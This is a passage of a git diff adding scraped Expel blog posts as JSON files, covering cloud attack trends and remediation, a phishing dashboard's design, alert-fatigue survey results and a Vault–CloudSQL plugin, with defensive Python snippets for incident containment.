b/cloud-attack-trends-what-you-need-to-know-and-how.json new file mode 100644 index 0000000000000000000000000000000000000000..aab8e5833730567acebb5aacfda636b36ff39df6 --- /dev/null +++ b/cloud-attack-trends-what-you-need-to-know-and-how.json @@ -0,0 +1,6 @@ +{ + "title": "Cloud attack trends: What you need to know and how ...", + "url": "https://expel.com/blog/cloud-attack-trends-need-to-know/", + "date": "May 25, 2021", + "contents": "Subscribe \u00d7 EXPEL BLOG Cloud attack trends: What you need to know and how to stay resilient Security operations \u00b7 7 MIN READ \u00b7 ANTHONY RANDAZZO \u00b7 MAY 25, 2021 \u00b7 TAGS: Cloud security / MDR / Tech tools Well, 2020 is getting smaller in our rearview mirror as our journey into 2021 takes us closer to summer. Good riddance. We\u2019d be remiss, though, if we didn\u2019t take some time to reflect on the things we observed and learned over the last year at Expel. So, we decided to take a close look at the cloud threat landscape. While we can easily get hung up on the black swan events of the year, we took a more data-driven approach to find the greatest threats to the majority of orgs today. At Expel, we view the cloud as any infrastructure, platforms or applications living in some data center that your org doesn\u2019t wholly manage. This might be your Amazon Web Services (AWS) or Microsoft Azure cloud infrastructure; an O365 or G Suite tenant; your GitHub repositories or perhaps the Okta instance that manages identity to all of your end users. During the COVID-19 pandemic, our SOC saw that bad actors wasted no time thinking of more evil ways to attack in the cloud and take advantage of people using phishing tactics. See full \u201cTop cybersecurity attack trend during COVID: Phishing\u201d infographic And the IC3\u2019s 2020 Internet Crime Report echoes our findings. 
It\u2019s disheartening to see that attackers used a crisis to their advantage to infiltrate cloud apps and increase their phishing efforts. But it\u2019s also not surprising. Bad actors will continue to evolve their tactics, using health and economic crises to manipulate unsuspecting people into surrendering their credentials and other information. That doesn\u2019t mean hope is lost. There are ways to remediate and stay resilient against the inevitable cloud attacks and phishing ploys. In this blog post, I\u2019ll cover the top three types of attacks we saw between March 2020 and March 2021, explain how to respond to an attack if it happens to you and share some steps you can take today to drastically reduce the chance of it happening to your business. Attack trend: Business email compromise If you\u2019ve taken a look at our \u201cTop cybersecurity attack trend during COVID: Phishing\u201d infographic, you\u2019ll know that business email compromise (BEC) is still public enemy number one. Here at Expel, the scale tips heavily toward BEC incidents in O365 versus G Suite. And there\u2019s one primary reason for that: O365 ships with some default configurations that need to be changed, whereas G Suite\u2019s settings out-of-the-box are pretty straightforward. We previously covered these configurations but here\u2019s the TL;DR: With original deployments of O365 tenants, IMAP and POP3 were enabled by default in O365 Exchange, as well as BasicAuthentication. IMAP and POP3 don\u2019t support multi-factor authentication (MFA), so even if you have MFA enabled, attackers can still access these mailboxes. BasicAuthentication allows attackers to authenticate with clients past any pre-authentication checks to the Identity Provider, which could lead to unwanted account compromises or account lockouts from password spray or brute force attacks. Microsoft intended to do away with BasicAuthentication by default but has postponed this rollout due to the COVID-19 pandemic. This is now expected to roll out before the end of 2021. Google, on the other hand, disables these configurations in G Suite by default but allows them to be enabled ex post facto. Remediation What should you do if you identify someone who shouldn\u2019t be in your O365 Exchange? Fortunately, it\u2019s pretty straightforward. Reset the user\u2019s credentials; Review the mailbox audit logs to determine if any unsavory activity occurred; and Remove any mail forwarding rules (if applicable). (A rough code sketch of these steps appears a little further down.) Resilience There are quite a few things you can do to prevent these BECs from being commonplace in your cloud email. First and foremost, ensure that you\u2019re using MFA wherever possible. While it\u2019s not a silver bullet, it\u2019s absolutely critical in today\u2019s cloud-first environments. Our data suggests that 35 percent of the BEC attempts we\u2019ve spotted could have been prevented by enabling MFA. Next, disable legacy protocols such as IMAP and POP3. Again, these don\u2019t support any sort of Modern Authentication (Modern Auth), which means an attacker can bypass MFA completely by using an IMAP/POP3 client. Once those are turned off, strongly consider disabling BasicAuthentication to prevent any pre-auth headaches on your O365 tenants. Seven percent of BEC attempts could have been stopped by enforcing modern authentication. If you\u2019re still not sleeping well at night, then consider implementing some extra layers of conditional access for your riskier user base. 
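To make those remediation steps a little more concrete before we get into conditional access specifics, here's a minimal sketch of what session revocation and forwarding-rule cleanup might look like against the Microsoft Graph API. It assumes you've already obtained a Graph access token with the necessary permissions and identified the affected user; the credential reset itself would happen in Azure AD or your identity provider, and this is an illustration rather than Expel's actual tooling.

```python
# Minimal sketch of the O365/Exchange Online BEC containment steps above,
# using the Microsoft Graph REST API via `requests`. Token acquisition and
# the credential reset itself are assumed to happen elsewhere.
import requests

GRAPH = "https://graph.microsoft.com/v1.0"


def contain_bec(user_id: str, token: str) -> None:
    headers = {"Authorization": f"Bearer {token}"}

    # 1. Kill the attacker's active sessions (forces re-authentication).
    requests.post(f"{GRAPH}/users/{user_id}/revokeSignInSessions",
                  headers=headers, timeout=30).raise_for_status()

    # 2. Review inbox rules and remove anything that forwards or redirects mail.
    resp = requests.get(f"{GRAPH}/users/{user_id}/mailFolders/inbox/messageRules",
                        headers=headers, timeout=30)
    resp.raise_for_status()
    for rule in resp.json().get("value", []):
        actions = rule.get("actions") or {}
        if actions.get("forwardTo") or actions.get("redirectTo"):
            print(f"Removing suspicious rule: {rule.get('displayName')}")
            requests.delete(
                f"{GRAPH}/users/{user_id}/mailFolders/inbox/messageRules/{rule['id']}",
                headers=headers, timeout=30).raise_for_status()
```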
You can even create a conditional access policy to require MFA registration from a location marked as a trusted network. This prevents an attacker from registering MFA from an untrusted network. Lastly, don\u2019t neglect your secure mail gateway. We recently helped a customer make some configuration changes that ultimately led to a major drop in the volume of phishing emails they received on a daily basis \u2013 reducing their BEC incident count. Attack trend: Cloud access providers If we remove the explicit BEC incidents, the next biggest targets we see are cloud access identity providers like Okta or OneLogin. While some attackers might just want access to your email for fraud purposes, others have their eyes on a bigger prize: the data behind your applications. Many orgs have already migrated to SSO (SAML) authentication, and this is especially the case in a post-2020 working environment where many employees work remotely. Which means that attackers can hit more than just mail providers as an easy target to harvest credentials. During 2020, we saw quite a few attacks on Okta, so we\u2019ll focus our remediation recommendations there. So, how are all of these Okta accounts getting compromised? A couple of ways. First, it\u2019s entirely possible to intercept session tokens for Okta after MFA has been established. We\u2019ve talked about this tactic a bit in the past (and yes, U2F will prevent this). These session tokens can then be used to maintain access indefinitely depending on the refresh token and any limitations it might have. But there\u2019s an even simpler approach: hoping unsuspecting end users will click that push notification. You might be amazed at how frequently this occurs. And the results can be disastrous (we personally have over 50 published applications for certain users in Okta). Remediation Remediation after a confirmed Okta access compromise may be a bit more involved than a BEC limited to a single Exchange Online mailbox. Here are the high level tasks: Terminate the user\u2019s active sessions to disrupt existing authenticated entities; Reset the compromised credentials; and Determine if an attacker accessed any published applications (hopefully not, as this will require subsequent remediation and responses against those apps). We have a quick workflow here at Expel that will grab all of the associated SSO activity. (A rough code sketch of these tasks appears a little further down.) Resilience Okta, in particular, has a feature called Adaptive MFA, which creates behavioral profiles of each of your users and introduces a little bit of friction when an anomalous login occurs. This friction might be the difference between being compromised or not. If you\u2019re running sensitive applications in Okta, then you might consider applying application-level MFA. Lastly, while we have become more distributed in a post-pandemic world, you might also consider implementing Network Zones to effectively develop an allow list for access in your sign-on policies. Cloud attack trend: Cloud infrastructure When we started theorizing where to focus detection efforts in cloud infrastructure, it was apparent that most risk lay in access to the control (management) planes. It turns out that attackers are, in fact, interested in this sort of access. Excessive access to the control plane opens organizations up to a bunch of problems and the reality is that all of the \u201cshift left\u201d security in the world doesn\u2019t prevent the use of compromised credentials. We know this access may be for financial gain or perhaps even persistent access. 
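Before digging further into cloud infrastructure, here's the sketch promised in the Okta remediation tasks above. It uses Okta's public REST API via plain HTTP calls; the org URL, API token handling and System Log filter are placeholders, and it's meant as an illustration rather than the workflow we actually run at Expel.

```python
# Minimal sketch of the Okta containment tasks described above, using
# Okta's REST API via `requests`. Values like the org URL and API token
# are placeholders.
import requests

OKTA = "https://your-org.okta.com"               # hypothetical org URL
HEADERS = {"Authorization": "SSWS <api-token>"}  # Okta API token


def contain_okta_user(user_id: str) -> list:
    # 1. Terminate all active sessions for the user.
    requests.delete(f"{OKTA}/api/v1/users/{user_id}/sessions",
                    headers=HEADERS, timeout=30).raise_for_status()

    # 2. Force a credential reset on next sign-in.
    requests.post(f"{OKTA}/api/v1/users/{user_id}/lifecycle/expire_password",
                  headers=HEADERS, timeout=30).raise_for_status()

    # 3. Pull recent activity from the System Log so you can check which
    #    published applications the account actually touched.
    logs = requests.get(
        f"{OKTA}/api/v1/logs",
        params={"filter": f'actor.id eq "{user_id}"',
                "since": "2021-03-01T00:00:00Z"},  # placeholder window
        headers=HEADERS, timeout=30)
    logs.raise_for_status()
    return [event.get("eventType") for event in logs.json()]
```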
The good news is that there are a variety of ways to prevent this. Remediation Cloud infrastructure response can vary quite a bit, given that each provider has a completely different Identity and Access Management (IAM) implementation. In AWS, it\u2019s a little more straightforward. Identify all compromised access keys. Exposure or compromise of access keys can happen en masse, so it\u2019s best to make sure you\u2019ve found them all. This can be done by pivoting on attacker access indicators such as IP address. Snapshot and remove any new infrastructure created by the attackers. Determine if any data plane access occurred (e.g., SSH access to your EC2 instances) and respond as necessary. (A rough code sketch of these steps appears at the end of this post.) Resilience Inadvertently exposed secrets can exacerbate this problem, so it\u2019s important to get a handle on your public git repositories. There are commercially available products to identify exposed secrets such as GitGuardian, or you can go at it yourself and use open source projects like truffleHog. The good news is that platforms like GitHub delay their public events API by five minutes to give organizations a head start on remediating these sorts of exposures. Another thing to think about is subscribing to AWS Security Hub to develop your own use-cases for automated incident response, or again, you can run at this alone via custom Lambda, CloudWatch or even your own SOAR platform. Another great AWS Organizations feature: develop least privilege access control with Service Control Policies to limit the blast radius of compromised credentials. New attacks. New resources. So what\u2019s in store for us for the rest of 2021? Well, we wish we had a crystal ball to say for sure but we can make some pretty educated guesses based on what we saw over the last 12 to 18 months. Events like the SolarWinds breach reminded us that the cloud is absolutely a target (golden SAML in Azure) and that we need to stay vigilant \u2013 and prepare for what might be around the corner. While attacks in the cloud and phishing aren\u2019t new, we know that bad actors will continue to get creative. And one thing is for sure: we\u2019ll continue to see BEC attacks at the same or even greater volume this year. Microsoft will hopefully roll out their more proactive controls, such as deprecating support for BasicAuthentication for Azure Active Directory (AzureAD), in 2021. Although, it seems like it\u2019s going to be at least a year before that comes to fruition for orgs that have mail clients actually using those authentication protocols with Exchange Online. Fortunately, we\u2019ll continue to see the development of resources and services that address new and changing security needs. At Expel, we\u2019ve been working on providing new products and services to help our existing and new customers endure the onslaught of 2020, and the new challenges it presented. When our customers let us know that they were drowning in phishing emails, we created the Expel Managed Phishing Service. So, in addition to our analysts providing 24\u00d77 managed security, they\u2019ll also have eyes on every single email someone at your org reports as a potential phishing attempt. While we can\u2019t stop attackers from being cunning, we can use our expertise (as a community) to help each other not only keep our heads above water but also prevent getting blindsided again. 
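As promised in the AWS remediation steps earlier, here's a rough boto3 sketch of what key deactivation, CloudTrail pivoting and evidence preservation might look like. The user names, access key IDs and instance IDs are placeholders, and a real response would layer in your own approvals and forensics process.

```python
# Rough boto3 sketch of the AWS remediation steps: deactivate a compromised
# access key, pivot through CloudTrail on that key to see what it touched,
# and snapshot an instance's volumes before tearing anything down.
import boto3

iam = boto3.client("iam")
cloudtrail = boto3.client("cloudtrail")
ec2 = boto3.client("ec2")


def contain_access_key(user_name: str, access_key_id: str) -> None:
    # 1. Deactivate the key (keep it around, inactive, for forensics).
    iam.update_access_key(UserName=user_name,
                          AccessKeyId=access_key_id,
                          Status="Inactive")

    # 2. Pivot on the key in CloudTrail to find what the attacker did.
    events = cloudtrail.lookup_events(
        LookupAttributes=[{"AttributeKey": "AccessKeyId",
                           "AttributeValue": access_key_id}])
    for event in events["Events"]:
        print(event["EventName"], event["EventTime"])


def snapshot_then_stop(instance_id: str) -> None:
    # 3. Preserve evidence from attacker-created infrastructure, then stop it.
    volumes = ec2.describe_volumes(
        Filters=[{"Name": "attachment.instance-id", "Values": [instance_id]}])
    for vol in volumes["Volumes"]:
        ec2.create_snapshot(VolumeId=vol["VolumeId"],
                            Description=f"IR snapshot for {instance_id}")
    ec2.stop_instances(InstanceIds=[instance_id])
```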
Check out Expel Managed Phishing" +} \ No newline at end of file diff --git a/cloud-security-archives.json b/cloud-security-archives.json new file mode 100644 index 0000000000000000000000000000000000000000..f712c7b8c2dec4c25fdbb9682b6ed63af3f0520b --- /dev/null +++ b/cloud-security-archives.json @@ -0,0 +1,6 @@ +{ + "title": "Cloud security Archives", + "url": "https://expel.com/blog/resource_topic/cloud-security/", + "date": null, + "contents": null +} \ No newline at end of file diff --git a/come-sea-how-we-tackle-phishing.json b/come-sea-how-we-tackle-phishing.json new file mode 100644 index 0000000000000000000000000000000000000000..03d09f16a897dadb73b2ca81f3651f78a6b4b476 --- /dev/null +++ b/come-sea-how-we-tackle-phishing.json @@ -0,0 +1,6 @@ +{ + "title": "Come sea how we tackle phishing", + "url": "https://expel.com/blog/expel-phishing-dashboard/", + "date": "Jun 8, 2021", + "contents": "Subscribe \u00d7 EXPEL BLOG Come sea how we tackle phishing: Expel\u2019s Phishing dashboard Security operations \u00b7 7 MIN READ \u00b7 KELLY NAKAWATASE \u00b7 JUN 8, 2021 \u00b7 TAGS: Phishing / Tech tools It\u2019s tough to stay afloat when you\u2019re drowning in phishing emails. While it\u2019s great that users are submitting suspicious-looking emails, you need to be able to glean meaningful information from all the data in those suspicious submissions. But how? And with what time? Our crew wanted to find a way to quickly show our Expel managed phishing service customers helpful data like who is attacking them, how often they\u2019re being attacked and whether or not their phishing training program is effective. Let\u2019s connect And this is where I come in. (Hi, I\u2019m Kelly, one of Expel\u2019s senior UX designers. I designed the Phishing dashboard.) In this post, I\u2019m going to talk (type?) you through the UX process that went on behind the scenes in creating the Expel Phishing dashboard \u2013 from figuring out which metrics would be the most useful for our customers to determining the right visualization for any given set of data. If you\u2019re developing a measurement framework for your own phishing program \u2013 or are just interested in learning how I created a dashboard centered on the goals of our users \u2013 you\u2019ll want to keep reading. Whale, what does the Expel managed phishing service do? Perfect meme, courtesy of the internet TL;DR: We triage and investigate the emails customers of our managed phishing service report as potential phishing. At its base, users submit suspicious looking emails to us so our SOC analysts can triage the email and determine whether or not the submission is benign or malicious. If the email is deemed malicious, our analysts do the legwork to figure out if there was an actual compromise, and if there was a compromise, we inform you and provide instructions to remediate the situation. If the email had malicious intent but users didn\u2019t fall for it, then our analysts conclude their investigation and offer recommendations to help improve overall security to ensure no one does fall for it in the future. Casting a net for goals I joined the phishing team in its infancy, and as a UX designer here at Expel, my job is to ensure that we keep our customers\u2019 goals top of mind when we create products. So, I started by asking questions: What\u2019s the purpose of this dashboard? What would customers be most interested in seeing on the dashboard? How often would they use it? How would they use it? Also a lot more questions. 
I talked to a few of our phishing proof of concept customers to get answers to these questions. I also talked to a few of our Engagement Managers (EMs), who are very in tune with what customers as a whole are generally trying to accomplish. These conversations helped me discover what our customers wanted to be able to do with their phishing programs, what holes they saw in other services. After a number of informational interviews, I formed four goals for the Phishing dashboard. Help customers report up to their executives on the state of phishing at their organization. Help train users who report the most false positives, and reward users who are great at catching phish! Identify oppor-tuna-ties to improve overall security and prevent future phishing. Show customers what they can expect to see. It\u2019s likely that if they\u2019re interested in our phishing service, they\u2019ve used other phishing-related apps to bulk up their program. If they\u2019re used to getting certain kinds of metrics around phishing, I wanted to make sure that the first iteration of our Phishing dashboard met that baseline at the very least so customers would never feel like they\u2019re lacking by just working with us. Deep diving for metrics I wanted to see what other products in the phishing space were doing when it comes to serving metrics, in order to design effectively. So, I looked at the ocean of phishing apps and software, combed through public product documentation and YouTube videos, and took inventory of all the metrics these products were showing on their dashboards and reporting. I compared these metrics to the ones we were already collecting for our proof of concept customers. Before I condensed this list and got rid of the duplicates, there were 132 data points. But, like I said, that was before getting rid of duplicates. And there were actually a lot of duplicates. So, I did the classic UX method of a good ol\u2019 analog card sort. Basically, I wrote every single metric (even the duplicates) onto a Post-It Note and grouped them by category. I did this a few times to get different kinds of groups. Then I grouped these metrics based on the goals I mentioned above. Photo of my analog card sort and my shadow self These were some of the metric categories I came up with. But it\u2019s actually not my opinion that matters the most here. Remember, our customers are the ones I have to keep in mind when designing. After condensing the list of metrics down to a manageable number, I was able to run an unmoderated, completely remote card sort with a customer and EMs to see how they\u2019d use these metrics, and if there were any metrics they thought were unnecessary or missing. I\u2019m proud to say that the categories these users came up with were quite similar to my own. Reeling it in for feasibility and tackling visualizations Once I had a shorter list of metrics and categories that would meet the goals for the Phishing dashboard, I knew I\u2019d have to reel it in based on time and technical feasibility. So, I met with the phishing engineers to discuss which items on the metrics list were realistic for a first version, and which metrics we\u2019d have to revisit for a later version. I let go of more complicated metrics like susceptibility by department and phish category (it\u2019s bookmarked for a future version though\u2026 maybe don\u2019t quote me ). 
But capturing key baseline metrics \u2013 being able to collect data and list out most common subjects, attachments, users and user accuracy \u2013 was definitely feasible. The next step was figuring out how to most effectively visualize these metrics. I looked at popular dashboard designs, aesthetically pleasing dashboards and whatever showed up in \u2018best dashboards\u2019 searches. I blocked out their visualizations to understand ideal page layout, the kinds of metrics and visualizations that got prioritized, and what kind of visual weight is given to any particular graph. You can\u2019t really just take a metric category and throw it into a pie chart and call it done. So much of good design in dashboards is finding the right visualization for the right group of metrics to tell the story that your users need. For example, a group of metrics I knew we needed to show were: Total user submissions for a given timeframe, How many of those submissions were malicious; and How many of those submissions were benign. It seemed like the most obvious visualization for this group would be to put it in a pie chart that shows the quantities in each metrics group and how they make up the whole of total submissions. Or maybe the most obvious visualization is to just show the raw counts of these numbers, or in a funnel, like our Workbench\u2122 Alerts Analysis Dashboard funnel. Example of straight counts, and adapting these metrics into graphics on our Workbench Alerts Analysis Dashboard But in talking to customers, I already knew that the straight quantity of submissions and their subsequent outcomes wasn\u2019t the interesting part of this data. In fact, showing straight quantities for this might be the least informative way of expressing this data. The story is what\u2019s important here. Below is what ended up being the final version of this data visualization, and it offers so much more information than a pie chart could. Customers are more interested in looking at how the outcomes of their suspicious emails trend, and whether or not there\u2019s a spike. If there\u2019s a spike, then you can investigate why there was a spike. You can interact with the legend to turn on and off certain outcomes, compare the lines and easily screenshot this for reports. Example of Expel Phishing Dashboard line graph Once I did this for all of the metric groupings that would appear on the Phishing dashboard, I laid it out and started chumming for feedback from current customers. And, wahoo! The feedback was largely positive, and I made some adjustments to wording and changes to which graphs got to be the principal in the school of visualizations. All aboard the Phishing dashboard tour Let\u2019s walk through the Expel Phishing dashboard 1.0. Reminder: if you\u2019re already an Expel customer, don\u2019t be koi, you can preview and interact with this krill-iant dashboard in Workbench! The image below shows submissions by outcome over time, which is what customers first look for upon landing here. You can look for spikes and trends in the data. On the right, we have some information on malicious senders and how many emails are sent per sender. We also have the number of unique submitters so customers can see how many of their users are reporting emails as potentially phishy. This can be an indicator for how effective training or end user education is. 
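As an aside, if you want to prototype the "submissions by outcome over time" view for your own phishing program, a few lines of pandas will get you a comparable line chart. The column names and sample data below are made up for illustration; the real Expel dashboard lives in Workbench, not a notebook.

```python
# Hypothetical sketch of a "submissions by outcome over time" view: given one
# row per reported email with a timestamp and a triage outcome, resample
# weekly and plot one line per outcome instead of a single pie chart.
import pandas as pd
import matplotlib.pyplot as plt

# Illustrative data; real rows would come from your phishing triage tooling.
submissions = pd.DataFrame({
    "submitted_at": pd.to_datetime(["2021-01-04", "2021-01-05", "2021-01-12",
                                    "2021-01-13", "2021-01-20", "2021-01-21"]),
    "outcome": ["benign", "malicious", "benign",
                "benign", "malicious", "benign"],
})

weekly = (submissions
          .set_index("submitted_at")
          .groupby("outcome")
          .resample("W")
          .size()
          .unstack(level=0, fill_value=0))

weekly.plot(kind="line", title="Phishing submissions by outcome per week")
plt.ylabel("Submissions")
plt.show()
```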
Expel Phishing Dashboard top level metrics of submissions over time and unique senders and submitters Moving down the dashboard, second level on the left, we have a horizontal bar chart. This gives customers information about how many submissions we\u2019re receiving from their users, and how many of those submissions turn into actual security incidents. On the right, we have information on the frequent submitters of malicious, benign, and all email submissions to give customers insight into which users may need more training. Metrics displaying how submissions funnel down to incidents, and submitter leaderboards In the next image, on the third level on the left, we show customers the kinds of attachments that show up in malicious emails. This helps customers create custom rules in their secure email gateway (SEG) to limit similar incoming emails. On the right is how often we use customer integrated technology to assist in our phishing investigations. This is to give customers an idea of their return on investment in their security vendors. Information on malicious attachment quantity and how often our analysts leverage your tech in phishing investigations Lastly, along the same vein as malicious attachments, we have frequent domains, senders and sender domains. This can help customers not only create rules in their SEG to limit incoming emails, but can also help them see if there\u2019s a themed campaign against their org. The final metrics on the Phishing dashboard provide information about recurring themes in malicious emails Hook, line, and sinker Of course, that\u2019s not the end of my job, or the end of the Phishing dashboard. After all, this is only version one. Bird\u2019s eye view of the primary Phishing dashboard mockup The Expel Phishing dashboard is on its maiden voyage, and I hope you enjoyed swimming alongside me. I\u2019m excited to be on this journey with our Expel managed phishing customers and the rest of the Expel crew. Want to see where we take the dashboard next? Hop aboard!" +} \ No newline at end of file diff --git a/companies-with-250-1000-employees-suffer-high-security.json b/companies-with-250-1000-employees-suffer-high-security.json new file mode 100644 index 0000000000000000000000000000000000000000..b2b48cfad5f0fa0d28d4753ff0b01109facfe76d --- /dev/null +++ b/companies-with-250-1000-employees-suffer-high-security.json @@ -0,0 +1,6 @@ +{ + "title": "Companies with 250-1000 employees suffer high security ...", + "url": "https://expel.com/blog/companies-with-250-1000-employees-suffer-high-security-alert-fatigue/", + "date": "May 2, 2023", + "contents": "Subscribe \u00d7 EXPEL BLOG Companies with 250-1,000 employees suffer high security alert fatigue Security operations \u00b7 3 MIN READ \u00b7 CHRIS WAYNFORTH \u00b7 MAY 2, 2023 \u00b7 TAGS: Careers / MDR In our recent report on cybersecurity in the United Kingdom (UK) , IT decision-makers (ITDMs) point to a corrosive dynamic threatening the effectiveness of their security operations centres (SOCs) and the well-being of their security and IT teams. In sum, fatigue stemming in large part from a barrage of alerts and false positives is disrupting workers\u2019 private lives, driving burnout and staff turnover at a time when there\u2019s a critical talent shortage in the industry. The effect is evident across the board, but companies with 250-1,000 employees (what Expel calls the commercial segment) are being hit especially hard. 
Let\u2019s review the findings and consider possible reasons why the 250/1k segment is suffering so badly. Regardless of these findings, we believe there\u2019s hope. At the end, we\u2019ll discuss strategies to help businesses not only survive, but thrive in this environment. Fatigue and burnout is worst for companies with 250-1,000 employees More than half of ITDMs say their SOCs spend too much time on alerts , with larger companies (250+) more likely to call it out as a particular concern. (Problem alerts include low-risk/low priority notifications and false positives.) Respondents in the 250/1k segment were most likely to say their teams spend too much time addressing alerts (60%). This segment also views the issue as more urgent, with a quarter saying they strongly agree. ITDMs in the 250/1k segment are also significantly more likely to cite alert fatigue as a problem for their security teams. The risk associated with fatigue is huge. As we noted in the UK report, an International Data Corporation (IDC) study found that a dizzying number of alerts are ignored\u201427% among companies with 500-1,499 employees (which includes a big chunk of the segment we\u2019re examining here). This revelation\u2014that more than a quarter of threat alerts hitting the SOC are being ignored\u2014should keep leaders and board members awake all night, every night. Alert fatigue and the 3CX hack In the recent 3CX attack, many of the platform\u2019s users had seen their endpoint protection software incorrectly flag known, good software as malicious in the past. Since 3CX\u2019s software was expected in their environment, many analysts assumed the endpoint protection software was incorrect, rather than suspecting the software had been the victim of a supply chain attack. \u2013 Greg Notch, Chief Information Security Officer, Expel Alert fatigue and burnout: the human toll Alert overload, alongside all the other challenges associated with running a 24/7 SOC (during an era plagued by a 3.4 million-person talent shortage ), represents an unsustainable infringement on security pros\u2019 personal lives. Ninety-three percent of ITDMs surveyed (and 95% in the 250/1k category) say their personal commitments are at least occasionally cancelled, delayed or interrupted because of work. But, as chart 3 indicates, the 250/1k group is affected significantly more often\u201451% of respondents say it happens all or most of the time, a stunning 15% more than the next highest segment. Unsurprisingly, then, ITDMs in this key segment say their groups experience substantially higher degrees of burnout \u201414% higher than the ITDM total. Staff turnover The upshot here is that burned-out workers make mistakes (like the missed alerts that happened in the 3CX supply chain attack) or leave (perhaps both). The potential for attrition is especially distressing, given the talent deficit noted above. Again, companies in the 250-1,000 employee range feel the crush worse than those in other segments. This cohort feels a greater intensity on this measure than other respondents. Its 27% positive response is eight points higher than the all-segment average. Why are companies with 250-1,000 employees having a harder time than other segments? 
Greg Notch, Expel\u2019s chief Information security officer (CISO), says these companies are \u201cbig enough to have big company problems, but lack the structure and funding to build a security program sufficient to defend their enterprise.\u201d The folks trying to keep those programs afloat are understaffed, so they\u2019re naturally burning out. Also, because they\u2019re stuck doing repetitive work just to keep the lights on, it\u2019s preventing their career growth into more strategic roles. So they leave to find those opportunities elsewhere. And it\u2019s easy for them to do that because of the talent shortage. He also says it \u201cdoesn\u2019t help that ransomware targeting is now going wider and down-market. As a result, these folks are in live-fire situations with bad business outcomes.\u201d The UK security report makes a couple of things clear. First, SOCs are under tremendous stress as they try to safeguard their organisations, and if CISOs and their teams feel overwhelmed the data illustrates why. Second, the pressure is substantially worse for IT/security teams in organisations with 250-1,000 employees. And now, the good news Given the dramatic worldwide talent shortage, it\u2019s na\u00efve to imagine that all organizations can find and afford the people needed to build and run their own SOCs. Managed detection and response (MDR) addresses these problems. MDRs are fully-managed, 24/7 services staffed by experts who specialise in detecting and responding to a wide range of cyberattacks, including phishing, ransomware, and threat hunting. By marrying human expertise to advanced technologies, MDR analysts can detect, investigate, neutralise, and remediate advanced attacks. This eliminates an organisation\u2019s need for a large staff. The best MDRs relentlessly research the latest hacker tactics and develop advanced tools to process massive amounts of data and automatically sort signal from noise\u2014meaning a company\u2019s analysts see the important alerts, not all the alerts. The list of benefits goes on, but the bottom line is that, for many organisations, MDR means broader, deeper, more sophisticated cyberdefense (and fewer headaches) for less money. If any of this sounds relevant for your business, we encourage you to review the full report and drop us a line ." +} \ No newline at end of file diff --git a/connect-hashicorp-vault-and-google-s-cloudsql-databases.json b/connect-hashicorp-vault-and-google-s-cloudsql-databases.json new file mode 100644 index 0000000000000000000000000000000000000000..939ea710332ba8c864d811db36483dea4526b41b --- /dev/null +++ b/connect-hashicorp-vault-and-google-s-cloudsql-databases.json @@ -0,0 +1,6 @@ +{ + "title": "Connect Hashicorp Vault and Google's CloudSQL databases", + "url": "https://expel.com/blog/connect-hashicorp-vault-and-googles-cloudsql-databases-new-plugin/", + "date": "Aug 31, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG Connect Hashicorp Vault and Google\u2019s CloudSQL databases: new plugin! Engineering \u00b7 3 MIN READ \u00b7 DAVID MONTOYA AND ISMAIL AHMAD \u00b7 AUG 31, 2022 \u00b7 TAGS: Cloud security / Tech tools We take protecting credentials seriously, and database (DB) credentials are no exception. They\u2019re juicy targets for attackers and often hold the keys to all your sensitive information. Making sure they\u2019re short-lived, rotated, scoped, auditable, and aligned with zero trust principles is central to boosting an organization\u2019s security posture. 
As you may know from our previous post, 5 best practices to get to production readiness with Hashicorp Vault in Kubernetes , we\u2019re long-time users of Vault, which specializes in credential management and offers a large plugin ecosystem for different databases. Sounds like a slam dunk right? Not so fast. As we began to explore using Vault to manage credentials for our Google-managed CloudSQL instances, we found ourselves stuck between two less-than-ideal out-of-the-box options, forcing us to compromise on operational complexity or, worse, security. Caught between a rock and a hard place, we dug deeper and built a new tool to meet our requirements. We think it\u2019s broadly useful for organizations using Vault and Google CloudSQL. And now, the good news: Expel is excited to open source a new Hashicorp Vault plugin. It brokers database credentials between Hashicorp Vault and Google\u2019s CloudSQL DBs and it doesn\u2019t require direct database access (via authorized networks ) or that you run Google\u2019s CloudSQL auth proxy. If you\u2019re wondering how that\u2019s possible, the plugin uses Google\u2019s best practice for authentication via IAM rather than a standard database protocol. Sound like something you could use? The plugin codebase can be found in GitHub . Why build a custom plugin? To better understand why we built this plugin, let\u2019s look at some of the challenges posed by using Vault\u2019s default database plugins to connect to CloudSQL instances. Per Google\u2019s documentation , there are two primary ways of authorizing database connections. Option 1: use CloudSQL authorized networks Google allows users to connect to CloudSQL databases using network-based authentication. To improve the security posture of your DB, Google recommends enabling SSL/TLS to add a layer of security. This requires users to manage an allowlist of IP CIDRs and SSL certificates on both the servers and clients for the databases they wish to connect to. As you can see, this gets tedious quickly. Imagine you have hundreds of CloudSQL databases\u2026 no one wants to manage that many firewall rules or certificates. Option 2: use CloudSQL Auth proxy Google\u2019s recommended approach for connecting to CloudSQL instances is to use the Auth proxy . Its benefits include: Uses IAM authorization instead of network-based access control (no more firewall rules!) Automatically wraps all DB connections with TLS 1.3 encryption regardless of the database protocol As we started exploring approaches for connecting our Vault instances to CloudSQL databases, we contemplated using the cloudsql-proxy (but shuddered at the operational complexity of running such a specialized sidecar along with our Vault servers). Developing a Hashicorp Vault plugin So, how exactly did we end up writing our own Vault plugin? As we researched options, we landed on a GitHub issue that referenced an interesting new Go connector for CloudSQL . The Google Cloud team had recently released a generalized Go library for authenticating to CloudSQL databases the same way that their auth proxy does. Being Go developers, our interest really piqued\u2013could we use this new library to get the best of both worlds (low operational complexity and security best practice)? By creating a new Vault plugin based on Google\u2019s Go connector, we were able to integrate Vault with CloudSQL databases all while taking advantage of Vault\u2019s existing capability to create and manage database credentials. 
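For a sense of what this looks like from a client's point of view once Vault is brokering CloudSQL credentials, here's a minimal sketch against Vault's standard database secrets engine HTTP API. The Vault address, mount path and role name are placeholders for whatever you configure, and the plugin itself (which handles the IAM-based connection to CloudSQL) isn't shown here.

```python
# Minimal sketch of a client requesting short-lived database credentials from
# Vault's database secrets engine over HTTP. Mount path ("database") and role
# name ("my-cloudsql-role") are placeholders.
import os
import requests

VAULT_ADDR = os.environ.get("VAULT_ADDR", "https://vault.example.internal:8200")
VAULT_TOKEN = os.environ["VAULT_TOKEN"]


def get_db_credentials(role: str = "my-cloudsql-role") -> dict:
    resp = requests.get(
        f"{VAULT_ADDR}/v1/database/creds/{role}",
        headers={"X-Vault-Token": VAULT_TOKEN},
        timeout=10,
    )
    resp.raise_for_status()
    body = resp.json()
    # Vault returns a lease along with the generated credentials; the
    # credentials expire (and are revoked) when the lease does.
    return {
        "username": body["data"]["username"],
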